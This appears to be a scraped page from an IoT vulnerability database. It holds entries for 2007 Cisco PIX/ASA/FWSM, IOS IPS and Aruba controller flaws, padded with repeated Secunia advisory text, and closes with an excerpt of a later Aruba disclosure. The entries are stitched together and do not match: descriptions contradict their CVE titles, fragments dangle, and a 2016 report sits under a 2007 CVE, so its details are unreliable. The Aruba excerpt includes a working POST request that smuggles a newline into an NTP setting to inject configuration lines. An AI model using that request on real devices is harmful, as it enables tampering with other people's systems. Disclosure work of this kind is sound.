VARIoT IoT vulnerabilities database
| VAR-200702-0346 | CVE-2007-0966 | Cisco Firewall Services Module vulnerable to DoS via inspection of malformed SIP messages |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.11), when the HTTPS server is enabled, allows remote attackers to cause a denial of service (device reboot) via certain HTTPS traffic. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. Multiple security vulnerabilities exist in Cisco PIX 500 Series Security Appliances and Cisco ASA 5500 Series Adaptive Security Appliances: Enhanced Inspection Malformed HTTP Traffic +--------------------- -------------------------- Cisco PIX and ASA Security Appliances may crash when checking for malformed HTTP requests if Enhanced HTTP Inspection is enabled . If HTTP application inspection is enabled, the configuration will contain a line similar to inspect http, where the name of the specific HTTP mapping. Note that normal HTTP inspection (configured via inspect http, without HTTP mapping) is not affected by this vulnerability. This vulnerability is documented in Cisco Bug ID as CSCsd75794. To trigger this vulnerability, the SIP fixup (for 6.x software) or inspect (for 7.x software) function must be enabled. SIP fixup (in 6.x and earlier) and SIP check (in 7. x and earlier) is enabled by default. This vulnerability is documented in Cisco Bug IDs as CSCsd97077 and CSCse27708. Check malformed TCP packet flow+------------------------------------------- ------ Cisco PIX and ASA equipment may crash when processing malformed packet flow based on TCP protocol. Protocols must be handled through the inspect function. The message may be sent to the device, or it may only pass through the device. Cisco PIX and ASA appliances can inspect the following TCP-based protocols: * Computer Telephony Interface Quick Buffer Encoding (CITQBE) * Distributed Computing Environment/Remote Procedure Call (DCE/RPC) * Domain Name Service (DNS) * Extended Simple Mail Transfer Protocol (ESMTP) * File Transfer Protocol (FTP) * H.323 Protocol * Hypertext Transfer Protocol (HTTP) * Internet Location Server (ILS) * Instant Messaging (IM) * Point-to-Point Tunneling Protocol (PPTP) * Remote Shell (RSH ) * Real Time Streaming Protocol (RTSP) * Session Initiation Protocol (SIP) *...
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
1) An unspecified error within the enhanced inspection of HTTP
traffic can be exploited to cause the device to reload via specially
crafted HTTP traffic.
Successful exploitation requires that enhanced inspection is
enabled.
2) An error within the inspection of SIP packets can be exploited to
cause the device to reload via specially crafted SIP packets.
Successful exploitation requires that SIP inspection is enabled.
3) An unspecified error when processing malformed HTTPS requests can
be exploited to cause the device to reload by sending specially
crafted HTTPS requests.
Successful exploitation requires that "authentication for network
access" (auth-proxy) is enabled.
4) An error when processing HTTP requests with a very long URL can be
exploited to cause the device to reload, but requires that
"authentication for network access" (auth-proxy) is enabled.
5) An unspecified error exists when processing HTTPS traffic that is
directed to the FWSM.
6) An unspecified error when processing malformed SNMP requests from
a trusted device can be exploited to cause the affected device to
reload.
Successful exploitation requires that the other, trusted device has
explicit SNMP poll access.
7) A security issue when manipulating ACLs (Access Control Lists)
that make use of object groups can corrupt ACLs, resulting in ACEs
(Access Control Entries) being skipped or not evaluated in order,
which can be exploited to bypass certain security restrictions.
Note: Only an administrative user can change ACLs. Additionally, this
does not affected devices which are reloaded after ACLs have been
manipulated.
A vulnerability that could cause the device to reload when
"debugging" is enabled has also been reported.
SOLUTION:
Apply updated software. Please see vendor advisory for a patch
matrix.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200702-0339 | CVE-2007-0959 | Cisco Firewall Services Module vulnerable to DoS via inspection of malformed SIP messages |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco PIX 500 and ASA 5500 Series Security Appliances 7.2.2, when configured to inspect certain TCP-based protocols, allows remote attackers to cause a denial of service (device reboot) via malformed TCP packets. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. According to Cisco Systems information TCP base The protocol inspection feature is enabled by default.Crafted by a third party TCP Device processing disruption by processing packets (DoS) It may be in a state. Cisco PIX and ASA are prone to a privilege-escalation vulnerability.
Exploiting this issue allows authenticated attackers to gain administrative privileges on affected computers. This may facilitate the complete compromise of the affected device. This issue is tracked by Cisco Bug ID: CSCsh33287. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. Protocols must be handled through the inspect function. The message may be sent to the device, or it may only pass through the device. Cisco PIX and ASA appliances can inspect the following TCP-based protocols: * Computer Telephony Interface Quick Buffer Encoding (CITQBE) * Distributed Computing Environment/Remote Procedure Call (DCE/RPC) * Domain Name Service (DNS) * Extended Simple Mail Transfer Protocol (ESMTP) * File Transfer Protocol (FTP) * H.323 Protocol * Hypertext Transfer Protocol (HTTP) * Internet Location Server (ILS) * Instant Messaging (IM) * Point-to-Point Tunneling Protocol (PPTP) * Remote Shell (RSH ) * Real Time Streaming Protocol (RTSP) * Session Initiation Protocol (SIP) * Small (or Simple) Client Control Protocol (SCCP) * Simple Mail Transfer Protocol (SMTP) * Oracle SQL*Net * Sun RPC.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
Try it out online:
http://secunia.com/software_inspector/
----------------------------------------------------------------------
TITLE:
Cisco PIX and ASA Privilege Escalation and Denial of Service
SECUNIA ADVISORY ID:
SA24160
VERIFY ADVISORY:
http://secunia.com/advisories/24160/
CRITICAL:
Moderately critical
IMPACT:
Privilege escalation, DoS
WHERE:
>From remote
OPERATING SYSTEM:
Cisco PIX 7.x
http://secunia.com/product/6102/
Cisco Adaptive Security Appliance (ASA) 7.x
http://secunia.com/product/6115/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco PIX and ASA, which
can be exploited by malicious users to gain escalated privileges and
by malicious people to cause a DoS (Denial of Service).
1) An unspecified error exists within the enhanced HTTP inspection
feature. This can be exploited to crash the device via malformed HTTP
requests, but requires that enhanced HTTP inspection is enabled.
2) An unspecified error exists within the SIP packet inspection. This
can be exploited to crash the device by sending specially crafted SIP
packets, but requires that "inspect" is enabled (it is disabled by
default).
3) An unspecified error exists within the TCP-based protocol
inspection. This can be exploited to crash the device via malformed
packets, but requires that inspection of TCP-based protocols (e.g.
FTP or HTTP) is enabled.
4) An unspecified error within the "LOCAL" authentication method can
be exploited to gain escalated privileges. Successful exploitation
allows gaining privilege level 15 and changing the complete
configuration of the device, but requires that the attacker can
authenticate to the device and that he is defined in the local
database with privilege level 0.
SOLUTION:
Apply updated versions. See the vendor advisory for a patch matrix.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200702-0342 | CVE-2007-0962 | Cisco PIX/ASA and FWSM Rogue HTTP Service disruption due to traffic (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco PIX 500 and ASA 5500 Series Security Appliances 7.0 before 7.0(4.14) and 7.1 before 7.1(2.1), and the FWSM 2.x before 2.3(4.12) and 3.x before 3.1(3.24), when "inspect http" is enabled, allows remote attackers to cause a denial of service (device reboot) via malformed HTTP traffic. According to Cisco Systems information, advanced HTTP The inspection function is disabled by default and is "inspect http" (HTTP Inspection ) Has been reported to be unaffected.Crafted by a third party HTTP Processing the request causes the device to interfere with service operation (DoS) It may be in a state. Cisco PIX and ASA are prone to a privilege-escalation vulnerability.
Exploiting this issue allows authenticated attackers to gain administrative privileges on affected computers. This may facilitate the complete compromise of the affected device. This issue is tracked by Cisco Bug ID: CSCsh33287. The Cisco PIX/ASA and Firewall Services Module (FWSM) provide firewall services with stateful packet filtering and deep packet inspection. Note that normal HTTP inspection (configured via inspect http, without HTTP mapping) is not affected by this vulnerability.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
Try it out online:
http://secunia.com/software_inspector/
----------------------------------------------------------------------
TITLE:
Cisco PIX and ASA Privilege Escalation and Denial of Service
SECUNIA ADVISORY ID:
SA24160
VERIFY ADVISORY:
http://secunia.com/advisories/24160/
CRITICAL:
Moderately critical
IMPACT:
Privilege escalation, DoS
WHERE:
>From remote
OPERATING SYSTEM:
Cisco PIX 7.x
http://secunia.com/product/6102/
Cisco Adaptive Security Appliance (ASA) 7.x
http://secunia.com/product/6115/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco PIX and ASA, which
can be exploited by malicious users to gain escalated privileges and
by malicious people to cause a DoS (Denial of Service).
1) An unspecified error exists within the enhanced HTTP inspection
feature. This can be exploited to crash the device via malformed HTTP
requests, but requires that enhanced HTTP inspection is enabled.
2) An unspecified error exists within the SIP packet inspection. This
can be exploited to crash the device by sending specially crafted SIP
packets, but requires that "inspect" is enabled (it is disabled by
default).
3) An unspecified error exists within the TCP-based protocol
inspection. This can be exploited to crash the device via malformed
packets, but requires that inspection of TCP-based protocols (e.g.
FTP or HTTP) is enabled.
4) An unspecified error within the "LOCAL" authentication method can
be exploited to gain escalated privileges. Successful exploitation
allows gaining privilege level 15 and changing the complete
configuration of the device, but requires that the attacker can
authenticate to the device and that he is defined in the local
database with privilege level 0.
SOLUTION:
Apply updated versions. See the vendor advisory for a patch matrix.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Successful exploitation requires that "SIP fixup" is enabled, which
is the default setting.
2) A security issue when manipulating ACLs (Access Control Lists)
that make use of object groups can corrupt ACLs, resulting in ACEs
(Access Control Entries) being skipped or not evaluated in order,
which can be exploited to bypass certain security restrictions.
Note: Only an administrative user can change ACLs. Additionally, this
does not affected devices which are reloaded after ACLs have been
manipulated
| VAR-200702-0341 | CVE-2007-0961 | Cisco Firewall Services Module vulnerable to DoS via inspection of malformed SIP messages |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco PIX 500 and ASA 5500 Series Security Appliances 6.x before 6.3(5.115), 7.0 before 7.0(5.2), and 7.1 before 7.1(2.5), and the FWSM 3.x before 3.1(3.24), when the "inspect sip" option is enabled, allows remote attackers to cause a denial of service (device reboot) via malformed SIP packets. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. According to information from Cisco Systems, SIP The inspection function is activated by default.Crafted by a third party SIP Device processing disruption by processing packets (DoS) It may be in a state. Cisco PIX and ASA are prone to a privilege-escalation vulnerability.
Exploiting this issue allows authenticated attackers to gain administrative privileges on affected computers. This may facilitate the complete compromise of the affected device. This issue is tracked by Cisco Bug ID: CSCsh33287. Note that normal HTTP inspection (configured via inspect http, without HTTP mapping) is not affected by this vulnerability. To trigger this vulnerability, the SIP fixup (for 6.x software) or inspect (for 7.x software) function must be enabled. SIP fixup (in 6.x and earlier) and SIP check (in 7. x and earlier) is enabled by default. Check malformed TCP packet flow+------------------------------------------- ------ Cisco PIX and ASA equipment may crash when processing malformed packet flow based on TCP protocol. Protocols must be handled through the inspect function. The message may be sent to the device, or it may only pass through the device. Cisco PIX and ASA appliances can inspect the following TCP-based protocols: * Computer Telephony Interface Quick Buffer Encoding (CITQBE) * Distributed Computing Environment/Remote Procedure Call (DCE/RPC) * Domain Name Service (DNS) * Extended Simple Mail Transfer Protocol (ESMTP) * File Transfer Protocol (FTP) * H.323 Protocol * Hypertext Transfer Protocol (HTTP) * Internet Location Server (ILS) * Instant Messaging (IM) * Point-to-Point Tunneling Protocol (PPTP) * Remote Shell (RSH ) * Real Time Streaming Protocol (RTSP) * Session Initiation Protocol (SIP) *...
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
Try it out online:
http://secunia.com/software_inspector/
----------------------------------------------------------------------
TITLE:
Cisco PIX and ASA Privilege Escalation and Denial of Service
SECUNIA ADVISORY ID:
SA24160
VERIFY ADVISORY:
http://secunia.com/advisories/24160/
CRITICAL:
Moderately critical
IMPACT:
Privilege escalation, DoS
WHERE:
>From remote
OPERATING SYSTEM:
Cisco PIX 7.x
http://secunia.com/product/6102/
Cisco Adaptive Security Appliance (ASA) 7.x
http://secunia.com/product/6115/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco PIX and ASA, which
can be exploited by malicious users to gain escalated privileges and
by malicious people to cause a DoS (Denial of Service).
1) An unspecified error exists within the enhanced HTTP inspection
feature. This can be exploited to crash the device via malformed HTTP
requests, but requires that enhanced HTTP inspection is enabled.
2) An unspecified error exists within the SIP packet inspection. This
can be exploited to crash the device by sending specially crafted SIP
packets, but requires that "inspect" is enabled (it is disabled by
default).
3) An unspecified error exists within the TCP-based protocol
inspection. This can be exploited to crash the device via malformed
packets, but requires that inspection of TCP-based protocols (e.g.
FTP or HTTP) is enabled.
4) An unspecified error within the "LOCAL" authentication method can
be exploited to gain escalated privileges. Successful exploitation
allows gaining privilege level 15 and changing the complete
configuration of the device, but requires that the attacker can
authenticate to the device and that he is defined in the local
database with privilege level 0.
SOLUTION:
Apply updated versions. See the vendor advisory for a patch matrix.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Successful exploitation requires that "SIP fixup" is enabled, which
is the default setting.
2) A security issue when manipulating ACLs (Access Control Lists)
that make use of object groups can corrupt ACLs, resulting in ACEs
(Access Control Entries) being skipped or not evaluated in order,
which can be exploited to bypass certain security restrictions.
Note: Only an administrative user can change ACLs. Additionally, this
does not affected devices which are reloaded after ACLs have been
manipulated
| VAR-200702-0267 | CVE-2007-0931 | Aruba Mobility Controller vulnerable to privilege escalation |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in the management interfaces in (1) Aruba Mobility Controllers 200, 800, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via long credential strings. The Aruba Mobility Controller Management Interface contains a buffer overflow. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable system. Aruba Mobility Controller is prone to multiple vulnerabilities that may lead to authentication bypass, remote code execution, denial-of-service conditions.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
2) An error in the guest account authentication process within the
Captive Portal can be exploited to e.g. gain access to administrative
sections without specifying a password.
SOLUTION:
Update to the latest patched firmware version.
https://support.arubanetworks.com
PROVIDED AND/OR DISCOVERED BY:
John Munther and Maxim Salomon, n.runs AG
ORIGINAL ADVISORY:
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052382.html
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052380.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200702-0313 | CVE-2007-0917 | Cisco IOS of IPS Detection evasion vulnerability in function |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
The Intrusion Prevention System (IPS) feature for Cisco IOS 12.4XE to 12.3T allows remote attackers to bypass IPS signatures that use regular expressions via fragmented packets. Cisco IOS is prone to a security-bypass vulnerability and a denial-of-service vulnerability.
An attacker could exploit the security-bypass issue to send malicious data to computers that would otherwise be protected by signature inspection.
An attacker could exploit the denial-of-service vulnerability to crash affected devices, denying service to legitimate users. Several vulnerabilities exist in the IOS IPS function, and only IOS images that include the IPS function are affected by these vulnerabilities. All IP protocols (such as TCP, UDP, ICMP) are affected by this vulnerability. ATOMIC.TCP Regular Expression Denial of Service Vulnerability+------------------------------------------- -------------------- Certain network communications may trigger IPS signatures using the regular expression capabilities of the ATOMIC.TCP signature engine, resulting in denial of service and interruption of network communications.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
Try it out online:
http://secunia.com/software_inspector/
----------------------------------------------------------------------
TITLE:
Cisco IOS IPS Security Bypass and Denial of Service
SECUNIA ADVISORY ID:
SA24142
VERIFY ADVISORY:
http://secunia.com/advisories/24142/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass, DoS
WHERE:
>From remote
OPERATING SYSTEM:
Cisco IOS R12.x
http://secunia.com/product/50/
Cisco IOS 12.x
http://secunia.com/product/182/
DESCRIPTION:
Two vulnerabilities have been reported in Cisco IOS, which can be
exploited by malicious people to bypass certain security restrictions
or cause a DoS (Denial of Service).
This can be exploited to bypass the detection mechanism by sending
specially crafted, fragmented IP packets.
2) An error exists within the ATOMIC.TCP scanning mechanism and
signatures, which use regular expressions (e.g. Signature 3123.0 for
Netbus Pro Traffic). This can be exploited to crash a device by
producing specially crafted network traffic.
SOLUTION:
See the vendor advisory for a patch matrix and workarounds.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20070213-iosips.shtml
http://www.cisco.com/en/US/products/products_security_response09186a00807e0a5e.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200702-0314 | CVE-2007-0918 | Cisco IOS of IPS Service disruption in functionality (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The ATOMIC.TCP signature engine in the Intrusion Prevention System (IPS) feature for Cisco IOS 12.4XA, 12.3YA, 12.3T, and other trains allows remote attackers to cause a denial of service (IPS crash and traffic loss) via unspecified manipulations that are not properly handled by the regular expression feature, as demonstrated using the 3123.0 (Netbus Pro Traffic) signature. Cisco IOS is prone to a security-bypass vulnerability and a denial-of-service vulnerability.
An attacker could exploit the security-bypass issue to send malicious data to computers that would otherwise be protected by signature inspection.
An attacker could exploit the denial-of-service vulnerability to crash affected devices, denying service to legitimate users. Cisco IOS is the operating system used by Cisco networking devices, and Cisco IOS Intrusion Prevention System (IPS) is a built-in deep packet inspection feature that allows Cisco IOS software to mitigate network attacks. Several vulnerabilities exist in the IOS IPS function, and only IOS images that include the IPS function are affected by these vulnerabilities. Fragmented packet evasion detection vulnerability + -------------------------------------- Some IPS features use regular expression. All IP protocols (such as TCP, UDP, ICMP) are affected by this vulnerability. ATOMIC.TCP Regular Expression Denial of Service Vulnerability+------------------------------------------- -------------------- Certain network communications may trigger IPS signatures using the regular expression capabilities of the ATOMIC.TCP signature engine, resulting in denial of service and interruption of network communications.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
Try it out online:
http://secunia.com/software_inspector/
----------------------------------------------------------------------
TITLE:
Cisco IOS IPS Security Bypass and Denial of Service
SECUNIA ADVISORY ID:
SA24142
VERIFY ADVISORY:
http://secunia.com/advisories/24142/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass, DoS
WHERE:
>From remote
OPERATING SYSTEM:
Cisco IOS R12.x
http://secunia.com/product/50/
Cisco IOS 12.x
http://secunia.com/product/182/
DESCRIPTION:
Two vulnerabilities have been reported in Cisco IOS, which can be
exploited by malicious people to bypass certain security restrictions
or cause a DoS (Denial of Service).
1) Cisco IOS IPS signatures using regular expressions may not
correctly identify malicious traffic within fragmented IP packets.
This can be exploited to bypass the detection mechanism by sending
specially crafted, fragmented IP packets.
2) An error exists within the ATOMIC.TCP scanning mechanism and
signatures, which use regular expressions (e.g. Signature 3123.0 for
Netbus Pro Traffic). This can be exploited to crash a device by
producing specially crafted network traffic.
SOLUTION:
See the vendor advisory for a patch matrix and workarounds.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20070213-iosips.shtml
http://www.cisco.com/en/US/products/products_security_response09186a00807e0a5e.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200702-0268 | CVE-2007-0932 | Aruba Mobility Controller vulnerable to privilege escalation |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The (1) Aruba Mobility Controllers 200, 600, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 do not properly implement authentication and privilege assignment for the guest account, which allows remote attackers to access administrative interfaces or the WLAN. The Aruba Mobility Controller Management Interface contains a buffer overflow. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable system. Aruba Mobility Controller is prone to multiple vulnerabilities that may lead to authentication bypass, remote code execution, denial-of-service conditions. Aruba ArubaOS/Aruba Instant/AirWave Management - Multiple Vulnerabilities
-------------------------------------------------------------------------
Introduction
============
Multiple vulnerabilities were identified in Aruba AP, IAP and AMP devices. The
Vulnerabilities were discovered during a black box security assessment and
therefore the vulnerability list should not be considered exhaustive. Several
of the high severity vulnerabilities listed in this report are related to the
Aruba proprietary PAPI protocol and allow remote compromise of affected devices.
Affected Software And Versions
==============================
- ArubaOS (all versions)
- AirWave Management Platform 8.x prior to 8.2
- Aruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1)
CVE
===
The following CVE were assigned to the issues described in this report:
- CVE-2016-2031
- CVE-2016-2032
Vulnerability Overview
======================
1. AMP: RabbitMQ Management interface exposed
2. AMP: XSRF token uses weak calculation algorithm
3. AMP: Arbitrary modification of /etc/ntp.conf
4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)
5. (I)AP: Insecure transmission of login credentials (GET)
6. (I)AP: Built in privileged "support" account
7. (I)AP: Static password hash for support account
8. (I)AP: Unusual account identified ("arubasecretadmin")
9. (I)AP: Privileged remote code execution
10. (I)AP: Radius passwords allow arbitrary raddb commands
11. (I)AP: Unauthenticated disclosure of environment variables
12. (I)AP: Information disclosure by firmware checking functionality
13. (I)AP: Unauthenticated automated firmware update requests
14. (I)AP: Firmware updater does not check certificates
15. (I)AP: Forceful downgrade of FW versions possible
16. (I)AP: Firmware update check discloses machine certificate
17. (I)AP: Firmware is downloaded via unencrypted connection
18. (I)AP: Firmware update Challenge/Response does not protect the Client
19. (I)AP: Unencrypted private keys and certs
20. (I)AP: Potential signature private key
21. (I)AP: PAPI Endpoints exposed to all interfaces
22. (I)AP: PAPI Endpoint does not validate MD5 signatures
23. (I)AP: PAPI protocol encrypted with weak encryption algorithm
24. (I)AP: PAPI protocol authentication bypass
25. (I)AP: Broadcast with detailed system information (LLDP)
26. (I)AP: User passwords are encrypted with a static key
Vulnerability Details
=====================
---------------------------------------------
1. AMP: RabbitMQ Management interface exposed
---------------------------------------------
AMPs expose the management frontend for the RabbitMQ message queue on all
interfaces via tcp/15672 and tcp/55672.
# netstat -nltp | grep beam
tcp 0 0 127.0.0.1:5672 0.0.0.0:*
LISTEN 2830/beam.smp
tcp 0 0 127.0.0.1:17716 0.0.0.0:*
LISTEN 2830/beam.smp
tcp 0 0 0.0.0.0:15672 0.0.0.0:*
LISTEN 2830/beam.smp
tcp 0 0 0.0.0.0:55672 0.0.0.0:*
LISTEN 2830/beam.smp
The password for the default user "airwave" is stored in the world readable
file /etc/rabbitmq/rabbitmq.config in plaintext:
# ls -l /etc/rabbitmq/rabbitmq.config
-rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config
# grep default_ /etc/rabbitmq/rabbitmq.config
{default_user,<<"airwave">>},
{default_pass,<<"***REMOVED***">>}
--------------------------------------------------
2. AMP: XSRF token uses weak calculation algorithm
--------------------------------------------------
The XSRF token is calculated based on limited sources of entropy, consisting of
the user's time of login and a random number between 0 and 99999. The algorithm
Is approximated by the following example Python script:
base64.b64encode(hashlib.md5('%d%5.5d' % (int(time.time()),
random.randint(0,99999))).digest())
-----------------------------------------------
3. AMP: Arbitrary modification of /etc/ntp.conf
-----------------------------------------------
Incorrect/missing filtering of input parameters allows injecting new lines and
arbitrary commands into /etc/ntp.conf, when updating the NTP settings via the
web frontend.
POST /nf/pref_network? HTTP/1.1
Host: 192.168.131.162
[...]
id=&ip_1=192.168.131.162&hostname_1=foo.example.com&
subnet_mask_1=255.255.255.248&gateway_1=192.168.131.161&dns1_1=172.16.255.1&
dns2_1=ð1_enabled_1=0ð1_ip_1=ð1_netmask_1=&
ntp1_1=time1.example.com%0afoo&ntp2_1=time2.example.com&save=Save
The above POST requests results in the following ntp.conf being generated:
# cat /etc/ntp.conf
[...]
server time1.example.com
foo
server time2.example.com
------------------------------------------------------------------------------
4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)
------------------------------------------------------------------------------
PAPI packets sent from an AP to an AMP are authenticated with a cryptographic
checksum. The packet format is only partially known, as it's a proprietary
format created by Aruba. A typical PAPI packet sent to an AMP is as follows:
0000 49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00 Ir..di.-........
0010 20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3 . .......>."I..
0020 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 P.@.]...F...
